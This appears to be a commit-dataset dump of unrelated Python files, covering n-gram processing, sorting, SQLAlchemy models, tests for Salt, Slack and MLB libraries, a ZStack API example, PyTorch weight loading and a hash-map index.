    for buffered_line in a_buffer[a_year]:
        out.write(buffered_line)
    del a_buffer[a_year][:]
if len(sys.argv) != 3:
    raise Exception("Provide 2 arguments:\n\t1,Source directory with raw corpus\n\t2,Target directory for transformed corpus")
directory = sys.argv[1]
target = sys.argv[2]
if not os.path.exists(target):
    os.makedirs(target)
# Stream every Google Books 5-gram shard, routing each record to a per-year
# output file (opened lazily on first use).
for gziped in glob.glob(os.path.join(directory, "googlebooks-*-5gram-20120701-*.gz")):
    print("Processing "+gziped)
    with gzip.open(gziped, 'rb') as unpacked:
        reader = codecs.getreader("utf-8")
        for line in reader(unpacked):
            text, year, match_count, volume_count = line.split("\t")
            # n-grams containing "_" carry part-of-speech tags; keep them
            # only when with_pos is set, plain n-grams otherwise.
            has_pos = "_" in text
            if (with_pos and has_pos) or (not with_pos and not has_pos):
                if year not in targets:
                    targets[year] = open(os.path.join(target,year),"w",encoding="utf-8")
                    my_buffer[year] = []
                elif len(my_buffer[year]) > 10000:
                    # cap per-year buffering to bound memory use
                    flush(my_buffer, targets, year)
                my_buffer[year].append(line)
# write out whatever is still buffered and close the per-year files
for year in targets:
    flush(my_buffer, targets, year)
    targets[year].close()
| Python | 0.999031 | |
8832a542405a1999c296cc8b55d454b8cf35b5ea | Add merge.py | algorithms/merge.py | algorithms/merge.py | import sys
sys.setrecursionlimit(1000000)
class Merge:
    """Top-down, stable merge sort producing a new sorted list."""

    def merge_sort(self, lists):
        """Return the elements of *lists* in ascending order.

        The input list is not modified; lists of length 0 or 1 are already
        sorted and are returned as-is.
        """
        if len(lists) <= 1:
            return lists
        mid = len(lists) // 2
        return self.merge(self.merge_sort(lists[:mid]),
                          self.merge_sort(lists[mid:]))

    def merge(self, left, right):
        """Merge two sorted lists into one sorted list.

        Stable: on ties the element from *left* is taken first.
        """
        merged = []
        li, ri = 0, 0
        while li < len(left) and ri < len(right):
            if left[li] <= right[ri]:
                merged.append(left[li])
                li += 1
            else:
                merged.append(right[ri])
                ri += 1
        merged.extend(left[li:])
        merged.extend(right[ri:])
        return merged
if __name__ == "__main__":
s = [3, 4, 1, 6, 2, 9, 7, 0, 8, 5]
merge = Merge()
print(merge.merge_sort(s))
| Python | 0.000003 | |
85b518638e990cb7be298ea4b533aa465dd681b5 | Add models to store data in... | acctwatch/models.py | acctwatch/models.py | from sqlalchemy import *
from sqlalchemy.ext.declarative import declarative_base
from sqlalchemy.orm import (
scoped_session,
sessionmaker,
relationship,
)
DBSession = scoped_session(sessionmaker())
Base = declarative_base()
class LoginItem(Base):
    """One authentication attempt: when it happened, whether it succeeded,
    and from which IP.  Actor and geo location are linked through the two
    association tables below."""
    __table__ = Table('login_item', Base.metadata,
            Column('id', Integer, primary_key=True, unique=True, autoincrement=True),
            Column('guid', String, index=True),
            Column('time', DateTime(timezone=True)),
            Column('success', Boolean, default=False, nullable=False),
            Column('failure', String, nullable=True),
            Column('ip', String, nullable=False),
            )
    actor = relationship("Actor", backref="logins", secondary="actor_logins")
    location = relationship("Location", backref="logins", secondary="login_locations")
class ActorLogins(Base):
    """Association table linking login attempts to actors (many-to-many)."""
    __table__ = Table('actor_logins', Base.metadata,
            Column('lid', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
            Column('aid', String, ForeignKey('actor.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
            PrimaryKeyConstraint('lid', 'aid'),
            )
class Actor(Base):
    """An account being watched, identified by an external string id."""
    __table__ = Table('actor', Base.metadata,
            Column('id', String, primary_key=True, unique=True),
            Column('email', String),
            )
class Location(Base):
    """A distinct location string a login was observed from."""
    __table__ = Table('location', Base.metadata,
            Column('id', Integer, primary_key=True, unique=True),
            Column('location', String(), unique=True, index=True)
            )
class LoginLocation(Base):
    """Association table linking login attempts to locations (many-to-many)."""
    __table__ = Table('login_locations', Base.metadata,
            Column('loc_id', Integer, ForeignKey('location.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
            Column('login_id', Integer, ForeignKey('login_item.id', onupdate="CASCADE", ondelete="RESTRICT"), nullable=False),
            PrimaryKeyConstraint('loc_id', 'login_id'),
            )
| Python | 0 | |
42e88bc8e6d81916164e8e0fe6b8b6c476567526 | add script to integrate disambiguated results | integrate.py | integrate.py | #!/usr/bin/env python
"""
Takes in a CSV file that represents the output of the disambiguation engine:
Patent Number, Firstname, Lastname, Unique_Inventor_ID
Groups by Unique_Inventor_ID and then inserts them into the Inventor table using
lib.alchemy.match
"""
import sys
import lib.alchemy as alchemy
from lib.util.csv_reader import read_file
from lib.handlers.xml_util import normalize_document_identifier
from collections import defaultdict
import cPickle as pickle
def integrate(filename):
    """Group raw inventors by disambiguated ID and link them in the database.

    Each CSV row is (patent_number, name_first, name_last,
    unique_inventor_id); all RawInventor rows matching a line are collected
    under that line's unique ID, the mapping is dumped to integrate.db for
    inspection, and each block is passed to alchemy.match.
    (This file targets Python 2: note itervalues and the print statement.)
    """
    blocks = defaultdict(list)
    for line in read_file(filename):
        patent_number, name_first, name_last, unique_inventor_id = line
        patent_number = normalize_document_identifier(patent_number)
        rawinventors = alchemy.session.query(alchemy.RawInventor).filter_by(
                patent_id = patent_number,
                name_first = name_first,
                name_last = name_last).all()
        blocks[unique_inventor_id].extend(rawinventors)
    # snapshot of the grouping, useful for debugging a disambiguation run
    pickle.dump(blocks, open('integrate.db', 'wb'))
    for block in blocks.itervalues():
        alchemy.match(block)
def main():
    """CLI entry point: expects the CSV path as the only argument."""
    if len(sys.argv) <= 1:
        print 'USAGE: python integrate.py <path-to-csv-file>'
        sys.exit()
    filename = sys.argv[1]
    integrate(filename)
if __name__ == '__main__':
    main()
| Python | 0 | |
80ecafd51cf258880bb5b1e183d5dd166c2d18fc | Add lockrun.py | lockrun.py | lockrun.py | import optparse
import signal
import threading
import syslog
import time
import os
import re
def find_process(first_pid, process):
    """Return the PID (int) whose /proc cmdline matches *process*, else False.

    Scans numeric /proc entries starting from *first_pid*'s position in the
    directory listing.
    """
    # Find a process in /proc
    process = re.sub(" +", " ", process).strip()
    m = re.compile("^[0-9]+$")
    all_proc = [ x for x in os.listdir("/proc") if m.search(x)]
    # NOTE(review): os.listdir order is arbitrary, and index() raises
    # ValueError if first_pid is missing -- the slice-from-index assumption
    # deserves a second look.
    for p in all_proc[all_proc.index(str(first_pid)):]:
        try:
            with open("/proc/%s/cmdline" % p, "r") as f:
                # cmdline is NUL-separated; normalise it to a spaced string
                cmdline = f.readline().replace("\x00", " ").rstrip('\n').strip()
                if process == cmdline:
                    return int(p)
        except IOError:
            # the process may have exited between listdir() and open()
            pass
    return False
def process_watcher(child_process, parent_pid, timeout):
    """Timer callback: SIGTERM the child command if it is still running."""
    child_pid = find_process(parent_pid, child_process)
    if child_pid:
        syslog.syslog(syslog.LOG_WARNING,
                      """Trying to kill process "%s"[%s] by timeout(%ss)"""
                      % (child_process, child_pid, timeout))
        os.kill(child_pid, signal.SIGTERM)
    else:
        syslog.syslog(syslog.LOG_WARNING,
                      """Can't find task process "%s" in /proc""" % child_process)
if __name__ == "__main__":
    op = optparse.OptionParser()
    op.add_option("-P", "--program", dest="program", default=False, type="string")
    op.add_option("-p", "--lockfile", dest="lockfile", default=False, type="string")
    op.add_option("-t", "--timeout", dest="timeout", default=False, type="int")
    opts, args = op.parse_args()
    # Arm a watchdog that kills the program if it exceeds the timeout.
    if opts.timeout:
        watcher = threading.Timer(opts.timeout, process_watcher, [opts.program, os.getpid(), opts.timeout])
        watcher.start()
    # Run program
    start_time = time.time()
    return_code = os.system(opts.program)
    total_tile = time.time() - start_time
    if opts.timeout:
        watcher.cancel()
    syslog.syslog(syslog.LOG_NOTICE,
                  """Command "%s" is done with return code: %s. Execution time %.2fs""" % (opts.program, return_code, total_tile))
| Python | 0.000002 | |
1551cb57ab21364a4e96fa109786ccb0a4ccc3a0 | Create MergeCSVs.py | utils/MergeCSVs.py | utils/MergeCSVs.py | # merge all columns of the csv file in current directory into a single 'merge.csv' file.
# requires pandas librairy to be installed.
# you can customize the merge in many ways: https://pandas.pydata.org/pandas-docs/stable/reference/api/pandas.concat.html
import pandas as pd
import glob
dfs = glob.glob('*.csv')
result = pd.concat([pd.read_csv(df, sep=';') for df in dfs], ignore_index=True)
result.to_csv('merge.csv')
| Python | 0 | |
9b6c1af3420653124495103169865036df4f7705 | Add logging module for Pyro-related debugging | osbrain/logging.py | osbrain/logging.py | import os
os.environ["PYRO_LOGFILE"] = "pyro_osbrain.log"
os.environ["PYRO_LOGLEVEL"] = "DEBUG"
| Python | 0 | |
bb188bcc196b12842378aa1c0c535800717a6b61 | add example to extract word frequencies | polbotcheck/word_frequencies.py | polbotcheck/word_frequencies.py | import nltk
from nltk.corpus import stopwords
def get_word_frequencies(text, words_n=10, lang='german'):
    """Print and return the *words_n* most common words in *text*.

    Tokenises with NLTK, drops one-character tokens, numeric tokens and
    stopwords for *lang*, lowercases the rest, and returns a list of
    (word, count) pairs in decreasing frequency order.
    """
    default_stopwords = set(nltk.corpus.stopwords.words(lang))
    words = nltk.tokenize.word_tokenize(text)
    words = [word for word in words if len(word) > 1]
    words = [word for word in words if not word.isnumeric()]
    words = [word.lower() for word in words]
    # lowercasing happens first because the NLTK stopword lists are lowercase
    words = [word for word in words if word not in default_stopwords]
    fdist = nltk.FreqDist(words)
    for word, frequency in fdist.most_common(words_n):
        print(u'{}:{}'.format(word, frequency))
    return fdist.most_common(words_n)
if __name__ == "__main__":
    # Demo on a German sample paragraph.
    text = 'Die offene Gesellschaft ist ein in der Tradition des Liberalismus stehendes Gesellschaftsmodell Karl Poppers, das zum Ziel hat, „die kritischen Fähigkeiten des Menschen“ freizusetzen. Die Gewalt des Staates soll dabei so weit wie möglich geteilt werden, um Machtmissbrauch zu verhindern. Poppers Vorstellung von der offenen Gesellschaft ist eng mit der Staatsform der Demokratie verbunden, allerdings nicht verstanden als Herrschaft der Mehrheit, sondern als die Möglichkeit, die Regierung gewaltfrei abzuwählen. Der offenen Gesellschaft steht einerseits die Laissez-Faire-Gesellschaft gegenüber, andererseits die totalitäre, am holistisch-kollektivistischen Denken ausgerichtete „geschlossene Gesellschaft“, die Popper auch ironisch den „Himmel auf Erden“ nennt, weil sie als solcher propagiert wird.'
    get_word_frequencies(text)
| Python | 0.001091 | |
1281d0e298d5b68f55e5c290e145ec0255552d7a | add tests | tests/test_backlight.py | tests/test_backlight.py | import i3pystatus.backlight as backlight
import os
import pytest
from contextlib import contextmanager
from operator import itemgetter
from tempfile import TemporaryDirectory
@contextmanager
def setattr_temporarily(obj, attr, value):
    """Temporarily set ``obj.attr`` to *value*, restoring the old value on exit.

    Bug fix: the restore now runs in a ``finally`` block, so the original
    value comes back even when the body of the ``with`` statement raises.
    """
    old_value = getattr(obj, attr)
    setattr(obj, attr, value)
    try:
        yield
    finally:
        setattr(obj, attr, old_value)
@pytest.mark.parametrize("backlights_data", [
[],
[("acpi_video0", 0, 255)],
[("acpi_video0", 86, 171)],
[("acpi_video0", 255, 255)],
[("intel_backlight", 0, 7)],
[("intel_backlight", 15, 33)],
[("intel_backlight", 79, 255)],
[("acpi_video0", 0, 50), ("intel_backlight", 44, 60)],
[("acpi_video0", 100, 100), ("intel_backlight", 187, 255)],
[("intel_backlight", 87, 88), ("acpi_video0", 150, 150)],
[("intel_backlight", 237, 237), ("acpi_video0", 1, 2)],
])
@pytest.mark.parametrize("format", [
None, "{brightness}/{max_brightness} ({percentage}%)"
])
@pytest.mark.parametrize("format_no_backlight", [
None, "({percentage}% -- {brightness}) [{max_brightness}]"
])
def test_backlight(backlights_data, format, format_no_backlight):
print(backlight.Backlight.base_path)
with TemporaryDirectory() as tmp_dirname:
for (backlight_name, brightness, max_brightness) in backlights_data:
backlight_dirname = tmp_dirname + "/" + backlight_name
os.mkdir(backlight_dirname)
with open(backlight_dirname + "/brightness", "w") as f:
print(brightness, file=f)
with open(backlight_dirname + "/max_brightness", "w") as f:
print(max_brightness, file=f)
if not format:
format = backlight.Backlight.format
if not format_no_backlight:
format_no_backlight = backlight.Backlight.format_no_backlight
if not format_no_backlight:
format_no_backlight = format
with setattr_temporarily(backlight.Backlight, 'base_path', tmp_dirname + "/{backlight}/"):
i3backlight = backlight.Backlight(
format=format,
format_no_backlight=format_no_backlight)
i3backlight.run()
if len(backlights_data) == 0:
used_format = format_no_backlight
cdict = {
"brightness": -1,
"max_brightness": -1,
"percentage": -1
}
else:
backlights_data = sorted(backlights_data, key=itemgetter(0))
(_, brightness, max_brightness) = backlights_data[0]
used_format = format
cdict = {
"brightness": brightness,
"max_brightness": max_brightness,
"percentage": round((brightness / max_brightness) * 100)
}
assert i3backlight.output["full_text"] == used_format.format(**cdict)
| Python | 0 | |
20ecbf00c05d1f959e78cbf87cf459fd46dea59f | Create pythonhelloworld.py | pythonhelloworld.py | pythonhelloworld.py | print "hello world"
| Python | 0.999993 | |
99a63431e441a1c52d3f16f6faf0594497755d45 | add a new special case install_zstack. It only installs zstack and initalize database, but not do any real cloud deployment | integrationtest/vm/basic/install_zstack.py | integrationtest/vm/basic/install_zstack.py | '''
@author: Youyk
'''
import os
import zstackwoodpecker.setup_actions as setup_actions
import zstackwoodpecker.test_lib as test_lib
import zstackwoodpecker.test_util as test_util
USER_PATH = os.path.expanduser('~')
EXTRA_SUITE_SETUP_SCRIPT = '%s/.zstackwoodpecker/extra_suite_setup_config.sh' % USER_PATH
def test():
    '''
    Install ZStack and initialize its database without deploying any cloud.
    '''
    action = setup_actions.SetupAction()
    action.plan = test_lib.all_config
    action.run()
    # Optional per-host hook: run extra setup commands only when the user
    # has provided the script.
    if os.path.exists(EXTRA_SUITE_SETUP_SCRIPT):
        os.system("bash %s" % EXTRA_SUITE_SETUP_SCRIPT)
    test_util.test_pass('ZStack Installation Success')
| Python | 0 | |
c6ded12845f25e305789840e1687bfee83e82be5 | Add a few simple pytest tests | tests/test_standings.py | tests/test_standings.py | #!/usr/bin/env python
import pytest
from datetime import datetime
from mlbgame import standings
# Shared fixture: a Standings object for a fixed 2017 timestamp, reused by
# the tests below.
date = datetime(2017, 5, 15, 19, 4, 59, 367187)
s = standings.Standings(date)
def test_standings_url():
    """Current-season standings should point at the live endpoint."""
    expected = ('http://mlb.mlb.com/lookup/json/named.standings_schedule_date.bam?season=2017&'
                'schedule_game_date.game_date=%272017/05/15%27&sit_code=%27h0%27&league_id=103&'
                'league_id=104&all_star_sw=%27N%27&version=2')
    assert s.standings_url == expected
def test_historical_standings_url():
    """Standings for a past season should use the historical endpoint."""
    past_date = datetime(2016, 5, 15)
    hist_standings = standings.Standings(past_date)
    expected = ('http://mlb.mlb.com/lookup/json/named.historical_standings_schedule_date.bam?season=2016&'
                'game_date=%272016/05/15%27&sit_code=%27h0%27&league_id=103&league_id=104&'
                'all_star_sw=%27N%27&version=48')
    assert hist_standings.standings_url == expected
def test_divisions_is_list():
    """The divisions listing must come back as a plain list (exact type)."""
    divisions = s.divisions
    assert type(divisions) is list
| Python | 0 | |
b04cc629279dc6d8cf09b4ed3e559e7693a77e02 | Add unit tests to check for all files in conf/ to be commented out | tests/unit/conf_test.py | tests/unit/conf_test.py | # -*- coding: utf-8 -*-
'''
Unit tests for the files in the salt/conf directory.
'''
# Import Python libs
from __future__ import absolute_import
import os
# Import Salt Testing libs
from salttesting import skipIf, TestCase
from salttesting.helpers import ensure_in_syspath
from salttesting.mock import (
NO_MOCK,
NO_MOCK_REASON,
)
ensure_in_syspath('../')
# Import Salt libs
import salt.config
SAMPLE_CONF_DIR = os.path.dirname(os.path.realpath(__file__)).split('tests')[0] + 'conf/'
@skipIf(NO_MOCK, NO_MOCK_REASON)
class ConfTest(TestCase):
    '''
    Validate files in the salt/conf directory.
    '''

    def _assert_sample_conf_is_commented(self, conf_file):
        '''
        Assert that the named file in the sample conf directory is completely
        commented out: parsing it must yield an empty configuration dict,
        i.e. it contains no lines other than comments and blanks.
        '''
        conf_path = SAMPLE_CONF_DIR + conf_file
        ret = salt.config._read_conf_file(conf_path)
        self.assertEqual(
            ret,
            {},
            'Sample config file \'{0}\' must be commented out.'.format(
                conf_path
            )
        )

    def test_conf_master_sample_is_commented(self):
        '''
        The sample config file located in salt/conf/master must be completely
        commented out. This test checks for any lines that are not commented or blank.
        '''
        self._assert_sample_conf_is_commented('master')

    def test_conf_minion_sample_is_commented(self):
        '''
        The sample config file located in salt/conf/minion must be completely
        commented out. This test checks for any lines that are not commented or blank.
        '''
        self._assert_sample_conf_is_commented('minion')

    def test_conf_cloud_sample_is_commented(self):
        '''
        The sample config file located in salt/conf/cloud must be completely
        commented out. This test checks for any lines that are not commented or blank.
        '''
        self._assert_sample_conf_is_commented('cloud')

    def test_conf_cloud_profiles_sample_is_commented(self):
        '''
        The sample config file located in salt/conf/cloud.profiles must be completely
        commented out. This test checks for any lines that are not commented or blank.
        '''
        self._assert_sample_conf_is_commented('cloud.profiles')

    def test_conf_cloud_providers_sample_is_commented(self):
        '''
        The sample config file located in salt/conf/cloud.providers must be completely
        commented out. This test checks for any lines that are not commented or blank.
        '''
        self._assert_sample_conf_is_commented('cloud.providers')

    def test_conf_proxy_sample_is_commented(self):
        '''
        The sample config file located in salt/conf/proxy must be completely
        commented out. This test checks for any lines that are not commented or blank.
        '''
        self._assert_sample_conf_is_commented('proxy')

    def test_conf_roster_sample_is_commented(self):
        '''
        The sample config file located in salt/conf/roster must be completely
        commented out. This test checks for any lines that are not commented or blank.
        '''
        self._assert_sample_conf_is_commented('roster')
# Allow running this module directly, outside the normal test runner.
if __name__ == '__main__':
    from integration import run_tests
    run_tests(ConfTest, needs_daemon=False)
| Python | 0 | |
5f5c98df4349fb31f0311b1fb7f0e6b9092b4b59 | add API example | apibinding/examples/example.py | apibinding/examples/example.py | import httplib
import json
import time
# return a dict containing API return value
def api_call(session_uuid, api_id, api_content):
conn = httplib.HTTPConnection("localhost", 8080)
headers = {"Content-Type": "application/json"}
if session_uuid:
api_content["session"] = {"uuid": session_uuid}
api_body = {api_id: api_content}
conn.request("POST", "/zstack/api", json.dumps(api_body))
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to make an API call, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
job_uuid = rsp["uuid"]
def query_until_done():
conn.request("GET", "/zstack/api/result/%s" % job_uuid)
response = conn.getresponse()
if response.status != 200:
raise Exception("failed to query API result, %s, %s" % (response.status, response.reason))
rsp_body = response.read()
rsp = json.loads(rsp_body)
if rsp["state"] == "Done":
return json.loads(rsp["result"])
time.sleep(1)
print "Job[uuid:%s] is still in processing" % job_uuid
return query_until_done()
return query_until_done()
def error_if_fail(rsp):
    '''
    Raise when the (single-key) API response dict reports failure.
    '''
    result = rsp.values()[0]
    if not result["success"]:
        raise Exception("failed to login, %s" % json.dumps(result["error"]))
def login():
content = {
"accountName": "admin",
"password": "b109f3bbbc244eb82441917ed06d618b9008dd09b3befd1b5e07394c706a8bb980b1d7785e5976ec049b46df5f1326af5a2ea6d103fd07c95385ffab0cacbc86"
}
rsp = api_call(None, "org.zstack.header.identity.APILogInByAccountMsg", content)
error_if_fail(rsp)
session_uuid = rsp.values()[0]["inventory"]["uuid"]
print "successfully login, session uuid is: %s" % session_uuid
return session_uuid
def create_zone(session_uuid):
content = {"name": "zone1"}
rsp = api_call(session_uuid, "org.zstack.header.zone.APICreateZoneMsg", content)
error_if_fail(rsp)
print "successfully created zone1"
def logout(session_uuid):
content = {"sessionUuid": session_uuid}
rsp = api_call(None, "org.zstack.header.identity.APILogOutMsg", content)
error_if_fail(rsp)
print "successfully logout"
# Example workflow: authenticate, create a zone, then end the session.
session_uuid = login()
create_zone(session_uuid)
logout(session_uuid)
| Python | 0 | |
01ee5e64093bfd6f6c57c27d189408f2f765f2b4 | Create load_from_numpy.py | load_from_numpy.py | load_from_numpy.py | import os
import torch
from torch.autograd import Variable
from torch import optim
import torch.nn.functional as F
import torch.nn as nn
import numpy as np
import models
import argparse
import time
import math
parser = argparse.ArgumentParser(description='load_from_numpy.py')
parser.add_argument('-save_model', default='mlstm-ns.pt',
help="""Model filename to save""")
parser.add_argument('-load_model', default='',
help="""Model filename to load""")
parser.add_argument('-train', default='data/input.txt',
help="""Text filename for training""")
parser.add_argument('-valid', default='data/valid.txt',
help="""Text filename for validation""")
parser.add_argument('-rnn_type', default='mlstm',
help='mlstm, lstm or gru')
parser.add_argument('-layers', type=int, default=1,
help='Number of layers in the encoder/decoder')
parser.add_argument('-rnn_size', type=int, default=4096,
help='Size of hidden states')
parser.add_argument('-embed_size', type=int, default=128,
help='Size of embeddings')
parser.add_argument('-seq_length', type=int, default=20,
help="Maximum sequence length")
parser.add_argument('-batch_size', type=int, default=64,
help='Maximum batch size')
parser.add_argument('-learning_rate', type=float, default=0.001,
help="""Starting learning rate.""")
parser.add_argument('-dropout', type=float, default=0.0,
help='Dropout probability.')
parser.add_argument('-param_init', type=float, default=0.05,
help="""Parameters are initialized over uniform distribution
with support (-param_init, param_init)""")
parser.add_argument('-clip', type=float, default=5,
help="""Clip gradients at this value.""")
parser.add_argument('--seed', type=int, default=1234,
help='random seed')
# GPU
parser.add_argument('-cuda', action='store_true',
help="Use CUDA")
opt = parser.parse_args()
embed = nn.Embedding(256, opt.embed_size)
rnn = models.StackedLSTM(models.mLSTM, opt.layers, opt.embed_size, opt.rnn_size, 256, opt.dropout)
embed.weight.data = torch.from_numpy(np.load("weights/embd.npy"))
rnn.h2o.weight.data = torch.from_numpy(np.load("weights/w.npy")).t()
rnn.h2o.bias.data = torch.from_numpy(np.load("weights/b.npy"))
rnn.layers[0].wx.weight.data = torch.from_numpy(np.load("weights/wx.npy")).t()
rnn.layers[0].wh.weight.data = torch.from_numpy(np.load("weights/wh.npy")).t()
rnn.layers[0].wh.bias.data = torch.from_numpy(np.load("weights/b0.npy"))
rnn.layers[0].wmx.weight.data = torch.from_numpy(np.load("weights/wmx.npy")).t()
rnn.layers[0].wmh.weight.data = torch.from_numpy(np.load("weights/wmh.npy")).t()
checkpoint = {
'rnn': rnn,
'embed': embed,
'opt': opt,
'epoch': 0
}
save_file = opt.save_model
print('Saving to '+ save_file)
torch.save(checkpoint, save_file)
| Python | 0.000005 | |
03123c64835f0a1d4cb16cbc638a432b99cc9d04 | Add a test case for #605 - the issue has been fixed by #606 | integration_tests/rtm/test_issue_605.py | integration_tests/rtm/test_issue_605.py | import asyncio
import collections
import logging
import os
import threading
import time
import unittest
import pytest
from integration_tests.env_variable_names import SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN, \
SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID
from slack import RTMClient, WebClient
class TestRTMClient_Issue_605(unittest.TestCase):
    """Runs integration tests with real Slack API
    https://github.com/slackapi/python-slackclient/issues/605
    """
    def setUp(self):
        # Token and channel come from the environment; this suite needs a
        # real Slack workspace to run against.
        self.logger = logging.getLogger(__name__)
        self.bot_token = os.environ[SLACK_SDK_TEST_CLASSIC_APP_BOT_TOKEN]
        self.channel_id = os.environ[SLACK_SDK_TEST_RTM_TEST_CHANNEL_ID]
        self.rtm_client = RTMClient(token=self.bot_token, run_async=False)
    def tearDown(self):
        # Reset the decorators by @RTMClient.run_on
        RTMClient._callbacks = collections.defaultdict(list)
    # Skipped by default: requires network access and a live workspace.
    @pytest.mark.skip()
    def test_issue_605(self):
        self.text = "This message was sent to verify issue #605"
        self.called = False
        # Flip self.called as soon as any RTM "message" event arrives.
        @RTMClient.run_on(event="message")
        def process_messages(**payload):
            self.logger.info(payload)
            self.called = True
        def connect():
            self.logger.debug("Starting RTM Client...")
            self.rtm_client.start()
        # Issue #605 concerns starting the RTM client off the main thread,
        # so the client deliberately runs in a daemon thread here.
        t = threading.Thread(target=connect)
        t.setDaemon(True)
        try:
            t.start()
            self.assertFalse(self.called)
            # Give the RTM connection time to establish (timing-based;
            # may be flaky on slow networks).
            time.sleep(3)
            self.web_client = WebClient(
                token=self.bot_token,
                run_async=False,
                loop=asyncio.new_event_loop(),  # TODO: this doesn't work without this
            )
            new_message = self.web_client.chat_postMessage(channel=self.channel_id, text=self.text)
            self.assertFalse("error" in new_message)
            # Wait for the posted message to come back over RTM.
            time.sleep(5)
            self.assertTrue(self.called)
        finally:
            t.join(.3)
# --- a/slack/rtm/client.py
# +++ b/slack/rtm/client.py
# @@ -10,7 +10,6 @@ import inspect
# import signal
# from typing import Optional, Callable, DefaultDict
# from ssl import SSLContext
# -from threading import current_thread, main_thread
#
# # ThirdParty Imports
# import asyncio
# @@ -186,7 +185,8 @@ class RTMClient(object):
# SlackApiError: Unable to retrieve RTM URL from Slack.
# """
# # TODO: Add Windows support for graceful shutdowns.
# - if os.name != "nt" and current_thread() == main_thread():
# + # if os.name != "nt" and current_thread() == main_thread():
# + if os.name != "nt":
# signals = (signal.SIGHUP, signal.SIGTERM, signal.SIGINT)
# for s in signals:
# self._event_loop.add_signal_handler(s, self.stop)
# Exception in thread Thread-1:
# Traceback (most recent call last):
# File "/path-to-python/asyncio/unix_events.py", line 95, in add_signal_handler
# signal.set_wakeup_fd(self._csock.fileno())
# ValueError: set_wakeup_fd only works in main thread
#
# During handling of the above exception, another exception occurred:
#
# Traceback (most recent call last):
# File "/path-to-python/threading.py", line 932, in _bootstrap_inner
# self.run()
# File "/path-to-python/threading.py", line 870, in run
# self._target(*self._args, **self._kwargs)
# File "/path-to-project/python-slackclient/integration_tests/rtm/test_issue_605.py", line 29, in connect
# self.rtm_client.start()
# File "/path-to-project/python-slackclient/slack/rtm/client.py", line 192, in start
# self._event_loop.add_signal_handler(s, self.stop)
# File "/path-to-python/asyncio/unix_events.py", line 97, in add_signal_handler
# raise RuntimeError(str(exc))
# RuntimeError: set_wakeup_fd only works in main thread | Python | 0 | |
54a41d23554c16c768a1113d8ad74291ad44bd67 | Add initial distributed hash map index | maras/index/dhm.py | maras/index/dhm.py | '''
A hash based index
'''
# Write sequence:
# 1. Get hash map file and file num
# 2. Write to associated storage file
# 3. Write to associated index file
# 4. Write to associated hash map file
# Import python libs
import struct
import os
# Import maras libs
import maras.utils
# Import third party libs
import msgpack
HEADER_DELIM = '_||_||_'
def calc_position(key, hash_limit, bucket_size, header_len):
    '''
    Calculate the hash map file's key position: the bucket index derived
    from the key's hash, scaled by the bucket size and offset past the
    file header.
    '''
    bucket_index = abs(hash(key) & hash_limit)
    return bucket_index * bucket_size + header_len
class DHM(object):
    '''
    Distributed Hash Map Index.

    Keys hash into fixed-size buckets inside per-directory map files;
    each bucket points at a chain of length-prefixed msgpack index
    entries appended to the same file.

    NOTE(review): ``create_h_index`` reads ``self.entry_fmt``,
    ``self.bucket_size`` and ``self.entry_map``, but ``__init__`` never
    defines them -- creating a brand new map file cannot work until those
    are supplied.
    '''
    def __init__(
            self,
            db_root,
            hash_limit=0xfffff,
            key_hash='sha1',
            header_len=1024,
            key_delim='/',
            open_fd=512,
            flush=True):
        self.db_root = db_root
        self.hash_limit = hash_limit
        self.key_hash = key_hash
        self.hash_func, self.key_size = maras.utils.get_hash_data(key_hash)
        self.header_len = header_len
        self.key_delim = key_delim
        self.open_fd = open_fd
        self.fds = []
        self.maps = {}
        self.flush = flush

    def _hm_dir(self, key):
        '''
        Return the hashmap directory for the given key
        '''
        key = key.strip(self.key_delim)
        # Translate the key delimiter into the OS directory separator
        # (os.sep). Previously this used os.pathsep (':' on posix), which
        # is the PATH-list separator and would not form nested directories.
        root = key[:key.rfind(self.key_delim)].replace(self.key_delim, os.sep)
        return os.path.join(self.db_root, root)

    def _i_entry(self, key, id_, start, size, type_, prev, **kwargs):
        '''
        Construct and return the index data entry as a serialized string:
        a 2-byte big-endian length prefix followed by the msgpack payload.
        '''
        entry = {
            'key': key,
            'st': start,
            'sz': size,
            'rev': maras.utils.gen_rev(),
            't': type_,
            'p': prev,
        }
        entry.update(kwargs)
        if not id_:
            entry['id'] = maras.utils.rand_hex_str(self.key_size)
        else:
            entry['id'] = id_
        packed = msgpack.dumps(entry)
        p_len = struct.pack('>H', len(packed))
        return '{0}{1}'.format(p_len, packed)

    def create_h_index(self, fn_):
        '''
        Create an index at the given location and return its header dict
        (with the open file object stored under 'fp')
        '''
        dirname = os.path.dirname(fn_)
        if not os.path.exists(dirname):
            os.makedirs(dirname)
        header = {
            'hash': self.key_hash,
            'h_limit': self.hash_limit,
            'header_len': self.header_len,
            # NOTE(review): these three attributes are never set in
            # __init__; see the class docstring.
            'fmt': self.entry_fmt,
            'bucket_size': self.bucket_size,
            'entry_map': self.entry_map,
        }
        header_entry = '{0}{1}'.format(msgpack.dumps(header), HEADER_DELIM)
        # 'w+b' so the file is created; 'r+b' raises IOError when the file
        # does not exist yet, which is exactly the situation this method is
        # called in (see _get_h_entry).
        fp_ = open(fn_, 'w+b')
        fp_.write(header_entry)
        header['fp'] = fp_
        return header

    def open_map(self, fn_):
        '''
        Attempt to open a map file, if the map file does not exist
        raise IOError
        '''
        fp_ = open(fn_, 'r+b')
        header = {'fp': fp_}
        raw_head = ''
        while True:
            raw_read = fp_.read(self.header_len)
            if not raw_read:
                raise ValueError('Hit the end of the index file with no header!')
            raw_head += raw_read
            if HEADER_DELIM in raw_head:
                header.update(
                    msgpack.loads(
                        raw_head[:raw_head.find(HEADER_DELIM)]
                    )
                )
                return header

    def _get_h_entry(self, key, fn_):
        '''
        Return the hash map entry for ``key`` from the given file name as
        (entry_dict_or_None, map_data). If the entry is not present,
        return None for it. If the file is not present, create it.
        '''
        if fn_ in self.maps:
            map_data = self.maps[fn_]
        else:
            try:
                map_data = self.open_map(fn_)
                self.maps[fn_] = map_data
            except IOError:
                map_data = self.create_h_index(fn_)
                self.maps[fn_] = map_data
        pos = calc_position(
            key,
